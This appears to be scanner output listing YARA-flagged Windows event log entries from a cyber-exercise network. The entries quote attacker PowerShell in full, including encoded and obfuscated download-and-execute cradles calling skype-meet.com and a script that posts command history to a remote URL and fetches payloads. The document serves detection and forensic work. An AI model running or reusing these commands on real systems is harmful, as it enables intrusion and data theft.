{"_index": "cyberpolygon2024-mercurylark-win", "_id": "vC99tpEBNKI3r7qcTaQ6", "_score": 1, "_source": {"@timestamp": "2024-09-03T06:05:38.726Z", "type": "wineventlog", "event": {"created": "2024-09-03T06:05:40.649Z", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "action": "Network connection detected (rule: NetworkConnect)", "code": "3", "original": "Network connection detected:\nRuleName: Alert,Metasploit\nUtcTime: 2024-09-03 06:05:36.931\nProcessGuid: {71952f51-16c3-669e-4800-000000005500}\nProcessId: 3348\nImage: C:\\Windows\\System32\\dns.exe\nUser: NT AUTHORITY\\SYSTEM\nProtocol: udp\nInitiated: false\nSourceIsIpv6: false\nSourceIp: 10.24.3.5\nSourceHostname: dc01.MercuryLark.corp\nSourcePort: 53\nSourcePortName: domain\nDestinationIsIpv6: false\nDestinationIp: 10.24.7.2\nDestinationHostname: -\nDestinationPort: 44455\nDestinationPortName: -"}, "index": "cyberpolygon2024-mercurylark-win", "log": {"level": "information"}, "@version": "1", "host": {"name": "dc01", "os": {"name": "Windows Server 2019 Datacenter", "platform": "windows", "build": "17763.973", "version": "10.0", "kernel": "10.0.17763.97[...]domain": "NT AUTHORITY"}, "event_data": {"SourceIp": "10.24.3.5", "SourceHostname": "dc01.MercuryLark.corp", "DestinationHostname": "-", "User": "NT AUTHORITY\\SYSTEM", "DestinationPortName": "-", "Image": "C:\\Windows\\System32\\dns.exe", "SourcePortName": "domain", "UtcTime": "2024-09-03 06:05:36.931", "ProcessId": 3348, "SourcePort": "53", "Protocol": "udp", "ProcessGuid": "{71952f51-16c3-669e-4800-000000005500}", "DestinationIp": "10.24.7.2", "RuleName": "Alert,Metasploit", "DestinationIsIpv6": "false", "SourceIsIpv6": "false", "Initiated": "false", "DestinationPort": "44455"}, "record_id": 1102500, "api": "wineventlog", "task": "Network connection detected (rule: NetworkConnect)", "channel": "Microsoft-Windows-Sysmon/Operational", "version": 5, "computer_name": "dc01.MercuryLark.corp", "provider_guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}", "process": {"pid": 10676, "thread": {"id": 5284}}}}}
SCORE:
70
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule LOG_Antivirus_Relevant_Signature_May22_1 / Detects relevant Antivirus events with signature matches that are highly relevant
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • detected (rule: NetworkConnect)", "code": "3", "original": "Network connection detected:\nRuleName: Alert,Metasploit
RULEDATE_1:
2022-05-11
TAGS_1:
LOG, SCRIPT
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Warning 12
Sep 10 18:22:34 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index": "cyberpolygon2024-mercurylark-win", "_id": "wCpatpEBNKI3r7qcb0Ei", "_score": 1, "_source": {"@timestamp": "2024-09-03T05:27:42.677Z", "type": "wineventlog", "event": {"created": "2024-09-03T05:27:44.598Z", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "code": "3", "action": "Network connection detected (rule: NetworkConnect)", "original": "Network connection detected:\nRuleName: Alert,Metasploit\nUtcTime: 2024-09-03 05:27:40.709\nProcessGuid: {71952f51-16c3-669e-4800-000000005500}\nProcessId: 3348\nImage: C:\\Windows\\System32\\dns.exe\nUser: NT AUTHORITY\\SYSTEM\nProtocol: udp\nInitiated: false\nSourceIsIpv6: false\nSourceIp: 10.24.3.5\nSourceHostname: dc01.MercuryLark.corp\nSourcePort: 53\nSourcePortName: domain\nDestinationIsIpv6: false\nDestinationIp: 10.24.118.57\nDestinationHostname: -\nDestinationPort: 44475\nDestinationPortName: -"}, "index": "cyberpolygon2024-mercurylark-win", "log": {"level": "information"}, "@version": "1", "host": {"id": "71952f51-1623-43c9-a67a-cf4232d9a08f", "os": {"name": "Windows Server 2019 Datacenter", "platform": "windows", "version": "10.0", "build"[...] "Microsoft-Windows-Sysmon", "event_data": {"SourceIp": "10.24.3.5", "SourceHostname": "dc01.MercuryLark.corp", "DestinationHostname": "-", "User": "NT AUTHORITY\\SYSTEM", "DestinationPortName": "-", "Image": "C:\\Windows\\System32\\dns.exe", "SourcePortName": "domain", "UtcTime": "2024-09-03 05:27:40.709", "Protocol": "udp", "SourcePort": "53", "ProcessId": 3348, "DestinationIp": "10.24.118.57", "RuleName": "Alert,Metasploit", "ProcessGuid": "{71952f51-16c3-669e-4800-000000005500}", "DestinationIsIpv6": "false", "SourceIsIpv6": "false", "DestinationPort": "44475", "Initiated": "false"}, "record_id": 1101250, "api": "wineventlog", "task": "Network connection detected (rule: NetworkConnect)", "channel": "Microsoft-Windows-Sysmon/Operational", "version": 5, "computer_name": "dc01.MercuryLark.corp", "provider_guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}", "process": {"pid": 10676, "thread": {"id": 5284}}}}}
SCORE:
70
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule LOG_Antivirus_Relevant_Signature_May22_1 / Detects relevant Antivirus events with signature matches that are highly relevant
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • detected (rule: NetworkConnect)", "original": "Network connection detected:\nRuleName: Alert,Metasploit
RULEDATE_1:
2022-05-11
TAGS_1:
LOG, SCRIPT
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Warning 13
Sep 10 18:26:46 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index": "cyberpolygon2024-mercurylark-win", "_id": "Tkwht5EBNKI3r7qcAaOX", "_score": 1, "_source": {"@timestamp": "2024-09-03T09:04:35.497Z", "type": "wineventlog", "event": {"created": "2024-09-03T09:04:36.634Z", "provider": "Microsoft-Windows-PowerShell", "kind": "event", "action": "Execute a Remote Command", "code": "4104", "original": "Creating Scriptblock text (1 of 1):\npowershell /w 1 /nop -encodedcommand aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBrAHkAcABlAC0AbQBlAGUAdAAuAGMAbwBtAC8AZgBhAHYAaQBjAG8AbgAuAGkAYwBvACIAKQA=\n\nScriptBlock ID: 5e65dd8a-2b6d-4b02-bcde-6034660f4bd4\nPath: "}, "index": "cyberpolygon2024-mercurylark-win", "log": {"level": "verbose"}, "@version": "1", "host": {"name": "pc01243", "os": {"platform": "windows", "name": "Windows 11 Pro", "build": "22631.4037", "version": "10.0", "kernel": "10.0.22621.4036 (WinBuild.160101.0800)", "type": "windows", "family": "windows"}, "id": "553fcd21-8750-45dd-a141-147a86db8821", "hostname": "pc01243", "mac": ["FA-16-3E-BD-EA-EF"], "architecture": "x86_64", "ip": ["fe80::cacd:8f18:a597:57e9", "10.24.69.74"]}, "tags": ["beats_input_codec_plain_applied"], "w[...]ype": "User", "identifier": "S-1-5-21-2213792943-3978625667-3641601853-1124", "domain": "MERCURYLARK"}, "event_data": {"MessageNumber": "1", "ScriptBlockText": "powershell /w 1 /nop -encodedcommand aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBrAHkAcABlAC0AbQBlAGUAdAAuAGMAbwBtAC8AZgBhAHYAaQBjAG8AbgAuAGkAYwBvACIAKQA=", "ScriptBlockId": "5e65dd8a-2b6d-4b02-bcde-6034660f4bd4", "MessageTotal": "1"}, "record_id": 1587, "api": "wineventlog", "task": "Execute a Remote Command", "channel": "Microsoft-Windows-PowerShell/Operational", "version": 1, "computer_name": "pc01243.MercuryLark.corp", "provider_guid": "{a0c1853b-5c40-4b15-8766-3cf1c58f985a}", "process": {"pid": 2256, "thread": {"id": 4920}}}}}
SCORE:
88
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule SUSP_PS1_Base64_Encoded_Pattern_Feb22_1 / Detects suspicious encoded PowerShell code pattern often found in malicious samples
SUBSCORE_1:
75
REF_1:
Internal Research
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcA
RULEDATE_1:
2022-02-28
TAGS_1:
SCRIPT, SUSP, T1059_001, T1132_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_PS1_IEX_Download_Base64_Indicator_Jul21_1 / Detects suspicious IEX download action in base64 encoded form
SUBSCORE_2:
70
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
  • aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQA
RULEDATE_2:
2021-07-19
TAGS_2:
SCRIPT, SUSP, T1059_001, T1132_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
4
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Warning 14
Sep 10 18:26:46 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index": "cyberpolygon2024-mercurylark-win", "_id": "wUwht5EBNKI3r7qcAaOa", "_score": 1, "_source": {"@timestamp": "2024-09-03T09:04:35.333Z", "type": "wineventlog", "event": {"created": "2024-09-03T09:04:35.611Z", "provider": "PowerShell", "kind": "event", "code": "400", "action": "Engine Lifecycle", "original": "Engine state is changed from None to Available. \n\nDetails: \n\tNewEngineState=Available\n\tPreviousEngineState=None\n\n\tSequenceNumber=13\n\n\tHostName=ConsoleHost\n\tHostVersion=5.1.22621.3958\n\tHostId=d7d206e3-dd45-4c37-aa2f-54d7208533bc\n\tHostApplication=powershell.exe powershell /w 1 /nop -encodedcommand aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBrAHkAcABlAC0AbQBlAGUAdAAuAGMAbwBtAC8AZgBhAHYAaQBjAG8AbgAuAGkAYwBvACIAKQA=\n\tEngineVersion=5.1.22621.3958\n\tRunspaceId=5c4adf39-7af9-465f-af10-9a96a7ba2393\n\tPipelineId=\n\tCommandName=\n\tCommandType=\n\tScriptName=\n\tCommandPath=\n\tCommandLine="}, "log": {"level": "information"}, "index": "cyberpolygon2024-mercurylark-win", "@version": "1", "host": {"name": "pc01243", "os": {"platform": "windows", "name": "Windows 11 Pro", "version": "10.0", "build": "[...]e\n\tPreviousEngineState=None\n\n\tSequenceNumber=13\n\n\tHostName=ConsoleHost\n\tHostVersion=5.1.22621.3958\n\tHostId=d7d206e3-dd45-4c37-aa2f-54d7208533bc\n\tHostApplication=powershell.exe powershell /w 1 /nop -encodedcommand aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBrAHkAcABlAC0AbQBlAGUAdAAuAGMAbwBtAC8AZgBhAHYAaQBjAG8AbgAuAGkAYwBvACIAKQA=\n\tEngineVersion=5.1.22621.3958\n\tRunspaceId=5c4adf39-7af9-465f-af10-9a96a7ba2393\n\tPipelineId=\n\tCommandName=\n\tCommandType=\n\tScriptName=\n\tCommandPath=\n\tCommandLine="}, "record_id": 826, "api": "wineventlog", "task": "Engine Lifecycle", "channel": "Windows PowerShell", "computer_name": "pc01243.MercuryLark.corp", "process": {"pid": 2256}}}}
SCORE:
88
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule SUSP_PS1_Base64_Encoded_Pattern_Feb22_1 / Detects suspicious encoded PowerShell code pattern often found in malicious samples
SUBSCORE_1:
75
REF_1:
Internal Research
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcA
RULEDATE_1:
2022-02-28
TAGS_1:
SCRIPT, SUSP, T1059_001, T1132_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_PS1_IEX_Download_Base64_Indicator_Jul21_1 / Detects suspicious IEX download action in base64 encoded form
SUBSCORE_2:
70
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
  • aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQA
RULEDATE_2:
2021-07-19
TAGS_2:
SCRIPT, SUSP, T1059_001, T1132_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
4
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Warning 15
Sep 10 18:26:46 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index": "cyberpolygon2024-mercurylark-win", "_id": "g0wht5EBNKI3r7qcKKn4", "_score": 1, "_source": {"@timestamp": "2024-09-03T09:04:41.345Z", "type": "wineventlog", "event": {"created": "2024-09-03T09:04:41.949Z", "provider": "Microsoft-Windows-PowerShell", "kind": "event", "code": "4104", "action": "Execute a Remote Command", "original": "Creating Scriptblock text (1 of 1):\n{( [ChaR] ( [cOnVert]::tOInT16(( [StRINg]$_ ) ,16 ) )) }\n\nScriptBlock ID: 5edc77b8-a783-462a-bfc9-68719109b182\nPath: "}, "log": {"level": "verbose"}, "index": "cyberpolygon2024-mercurylark-win", "@version": "1", "host": {"id": "553fcd21-8750-45dd-a141-147a86db8821", "os": {"platform": "windows", "name": "Windows 11 Pro", "build": "22631.4037", "version": "10.0", "kernel": "10.0.22621.4036 (WinBuild.160101.0800)", "type": "windows", "family": "windows"}, "name": "pc01243", "hostname": "pc01243", "mac": ["FA-16-3E-BD-EA-EF"], "architecture": "x86_64", "ip": ["fe80::cacd:8f18:a597:57e9", "10.24.69.74"]}, "tags": ["beats_input_codec_plain_applied"], "winlog": {"event_id": "4104", "activity_id": "{a31e3d22-fddf-0001-8ac0-1fa3dffdda01}", "opcode": "On create calls", "user": {"name": "j-taylor", "type": "User", "identifier": "S-1-5-21-2213792943-3978625667-3641601853-1124", "domain": "MERCURYLARK"}, "provider_name": "Microsoft-Windows-PowerShell", "event_data": {"MessageNumber": "1", "ScriptBlockText": "{( [ChaR] ( [cOnVert]::tOInT16(( [StRINg]$_ ) ,16 ) )) }", "ScriptBlockId": "5edc77b8-a783-462a-bfc9-68719109b182", "MessageTotal": "1"}, "record_id": 1608, "api": "wineventlog", "task": "Execute a Remote Command", "channel": "Microsoft-Windows-PowerShell/Operational", "version": 1, "computer_name": "pc01243.MercuryLark.corp", "provider_guid": "{a0c1853b-5c40-4b15-8766-3cf1c58f985a}", "process": {"pid": 1736, "thread": {"id": 8380}}}}}
SCORE:
79
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule Casing_Anomaly_Convert_PS / Detects casing anomaly in Convert PS statement
SUBSCORE_1:
65
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • [cOnVert]
RULEDATE_1:
2018-10-09
TAGS_1:
ANOMALY, CASING, SCRIPT, SUSP, T1027, T1059, T1059_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule Casing_Anomaly_String_Statement / Detects suspicious casing of [string] statement
SUBSCORE_2:
60
REF_2:
Internal Research
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
  • [StRINg]
RULEDATE_2:
2018-12-30
TAGS_2:
ANOMALY, CASING, SCRIPT, SUSP, T1027
AUTHOR_2:
Florian Roth
REASONS_COUNT:
3
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Warning 16
Sep 10 18:27:01 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index": "cyberpolygon2024-mercurylark-win", "_id": "UEwht5EBNKI3r7qcKKn4", "_score": 1, "_source": {"@timestamp": "2024-09-03T09:04:41.133Z", "type": "wineventlog", "event": {"created": "2024-09-03T09:04:41.949Z", "provider": "Microsoft-Windows-PowerShell", "kind": "event", "action": "Execute a Remote Command", "code": "4104", "original": "Creating Scriptblock text (1 of 1):\n.((gv '*MDr*').Name[3,11,2]-Join'') (-JOIN('24%55%52T4c%20_3dm20Y22_68_74m74n70Y3a%2fR2fm6dm69T63_72%6fT73n6fR66O74R2d%6f%66Y66Y69Y63O65n33Y35T36%2en63Y6f_6dm22O3b' -sPLiT'O'-spLit'm' -SplIt 'R' -SpLIT 'T' -spLIT'%' -SPlIt 'Y'-sPLIT 'n' -SPLIt'_'|FOreacH-oBJeCt {( [ChaR] ( [cOnVert]::tOInT16(( [StRINg]$_ ) ,16 ) )) }))\n\n$URL_d = $URL;\n\nfunction Send-Debug{\n param([Parameter(Position = 0)][String]$Info)\n $id = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes(\"$env:COMPUTERNAME`:$env:USERDNSDOMAIN\\$e[...]rameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $Priv)\n $res = $NULL;\n whoami /priv | Select-String -Pattern $Priv | ForEach-Object {$_.Line -replace '^\\s+'} | ForEach-Object {echo ($_.tostring() -split \"\\W\")} | ForEach-Object {if($_.tostring() -eq \"\u0432\u043a\u043b\u044e\[...]])]\n param(\n [Parameter(Position = 0)][String]$Path,\n [Parameter(Position = 1)][String]$Name\n )\n process{\n if(Test-Path $[...]m.IO.File]::ReadAllBytes($PathToHistory));\n$id = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.Get[...]v:USERDNSDOMAIN\\$env:USERNAME\"))\nInvoke-WebRequest -Uri \"$URL/?id=h+$id\" -Method POST -Body $History;\n\nSV VAR1 ([type](\"sYsteM.IO.dIrECtorY\"));\n$DirPath = \"$env:TEMP\\\";\n(Dir variable:VAR1).value::\"CreateDirectory\"($DirPath);\nSend-Debug \"Dir created\";\n\nif($SeImpersonatePrivilege){$FilePath = $DirPath + \"taskhost.exe\"; $URL = $URL + \"/static/1/favicon.ico\";}\nif(-not $FilePath -and $AlwaysInstallElivated) {$FilePath = $DirPath + \"MsEdge.msi\"; $URL = $URL + \"/static/3/favicon.ico\";}\nif(-not $FilePath -and -not $
SCORE:
85
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule Casing_Anomaly_PowerShell_ForeEach / Detects casing anomalies in PowerShell function names
SUBSCORE_1:
70
REF_1:
Internal Research
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • FOreacH-oBJeCt
  • ForEach-Object
RULEDATE_1:
2022-07-11
TAGS_1:
ANOMALY, CASING, SCRIPT, SUSP, T1027, T1059_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule Casing_Anomaly_Convert_PS / Detects casing anomaly in Convert PS statement
SUBSCORE_2:
65
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
  • [cOnVert]
  • [Convert]
RULEDATE_2:
2018-10-09
TAGS_2:
ANOMALY, CASING, SCRIPT, SUSP, T1027, T1059, T1059_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
5
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Warning 17
Sep 10 18:27:01 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index": "cyberpolygon2024-mercurylark-win", "_id": "7Ewht5EBNKI3r7qcKKn4", "_score": 1, "_source": {"@timestamp": "2024-09-03T09:04:38.353Z", "type": "wineventlog", "event": {"created": "2024-09-03T09:04:39.711Z", "provider": "Microsoft-Windows-PowerShell", "kind": "event", "action": "Execute a Remote Command", "code": "4104", "original": "Creating Scriptblock text (1 of 1):\niex (New-Object Net.WebClient).DownloadString(\"http://skype-meet.com/favicon.ico\")\n\nScriptBlock ID: a660ec12-b169-4148-a6b7-5fdec53249fa\nPath: "}, "log": {"level": "verbose"}, "index": "cyberpolygon2024-mercurylark-win", "@version": "1", "host": {"name": "pc01243", "id": "553fcd21-8750-45dd-a141-147a86db8821", "os": {"name": "Windows 11 Pro", "platform": "windows", "build": "22631.4037", "version": "10.0", "kernel": "10.0.22621.4036 (WinBuild.160101.0800)", "type": "windows", "family": "windows"}, "hostname": "pc01243", "mac": ["FA-16-3E-BD-EA-EF"], "architecture": "x86_64", "ip": ["fe80::cacd:8f18:a597:57e9", "10.24.69.74"]}, "tags": ["beats_input_codec_plain_applied"], "winlog": {"event_id": "4104", "activity_id": "{a31e3d22-fddf-0001-6cc0-1fa3dffdda01}", "opcode": "On create calls", "user": {"name": "j-taylor", "type": "User", "identifier": "S-1-5-21-2213792943-3978625667-3641601853-1124", "domain": "MERCURYLARK"}, "provider_name": "Microsoft-Windows-PowerShell", "event_data": {"MessageNumber": "1", "ScriptBlockText": "iex (New-Object Net.WebClient).DownloadString(\"http://skype-meet.com/favicon.ico\")", "ScriptBlockId": "a660ec12-b169-4148-a6b7-5fdec53249fa", "MessageTotal": "1"}, "record_id": 1592, "api": "wineventlog", "task": "Execute a Remote Command", "channel": "Microsoft-Windows-PowerShell/Operational", "version": 1, "computer_name": "pc01243.MercuryLark.corp", "provider_guid": "{a0c1853b-5c40-4b15-8766-3cf1c58f985a}", "process": {"pid": 1736, "thread": {"id": 8380}}}}}
SCORE:
83
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule SUSP_PS1_Pattern_Combo_Feb22_1 / Detects suspicious PowerShell code pattern often found in malicious samples
SUBSCORE_1:
75
REF_1:
Internal Research
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • iex (New-Object Net.WebClient).DownloadString
RULEDATE_1:
2022-02-28
TAGS_1:
ANOMALY, SCRIPT, SUSP, T1059_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_PS1_IEX_From_Download_Dec22_1 / Detects command lines or scripts making use of AstroBWT miner (a Monero crypto coin miner)
SUBSCORE_2:
65
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
  • iex (New-Object
  • ).Download
RULEDATE_2:
2022-12-28
TAGS_2:
SCRIPT, SUSP, T1059_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
2
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Warning 18
Sep 10 18:27:01 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index": "cyberpolygon2024-mercurylark-win", "_id": "7Uwht5EBNKI3r7qcKKn4", "_score": 1, "_source": {"@timestamp": "2024-09-03T09:04:40.261Z", "type": "wineventlog", "event": {"created": "2024-09-03T09:04:41.943Z", "provider": "Microsoft-Windows-PowerShell", "kind": "event", "action": "Execute a Remote Command", "code": "4104", "original": "Creating Scriptblock text (1 of 1):\n. ( $pSHOMe[4]+$pSHOmE[30]+'x') ( -joIN [CHar[]] (46, 40 , 40 ,103,118 , 32,39,42 ,77 , 68,114,42 , 39 , 41 , 46 ,78 , 97,109, 101, 91,51, 44 , 49,49 , 44 , 50,93, 45 ,74, 111,105 ,110,39,39 ,41, 32, 40 ,45 , 74,79 , 73, 78 , 40, 39, 50 ,52 , 37 , 53,53 , 37,53 ,50,84 , 52 ,99, 37,50,48,95, 51 ,100, 109,50, 48, 89, 50, 50 , 95 ,54 , 56, 95 ,55 ,52,109,55 ,52 , 110 ,55 , 48 , 89, 51,97 , 37 , 50, 102,82 , 50 ,102 , 109 ,54,100, 109,54 ,57 , 84, 54 ,51 , 95 ,55,50, 37 , 54,102, 84 ,55 , 51,110,54,102 , 82 , 54 ,54 , 79 ,55 , 52, 82, 50,100 , 37 ,54 ,102 ,37,54,54,89 ,54 ,54 , 89,54 ,57, 89 ,54,51, 79, 54 ,53,110,51 , 51 , 89,51,53 , 84, 51 ,54,37,50,101, 110 ,54, 51 , 89 ,54 , 102 , 95,[...],99, 116, 105,111, 110 , 32,67 ,104 ,101 , 99 , 107 , 45, 80 ,114,105 , 118,32,123,13,10 ,32 ,32,32 , 32 , 91 , 67 ,109 , 100,108 ,101 ,116 ,66,105,110, 100, 105, 110,103, 40,41 ,93, 91, 79, 117,116, 112 , 117, 116 , 84 ,121 ,112 , 101 , 40,91,98, 111 ,111,108 ,93 ,41 ,93, 13 , 10, 32 ,32 , 32,32 ,112, 97, 114 ,97, 109 , 32 , 40 ,32 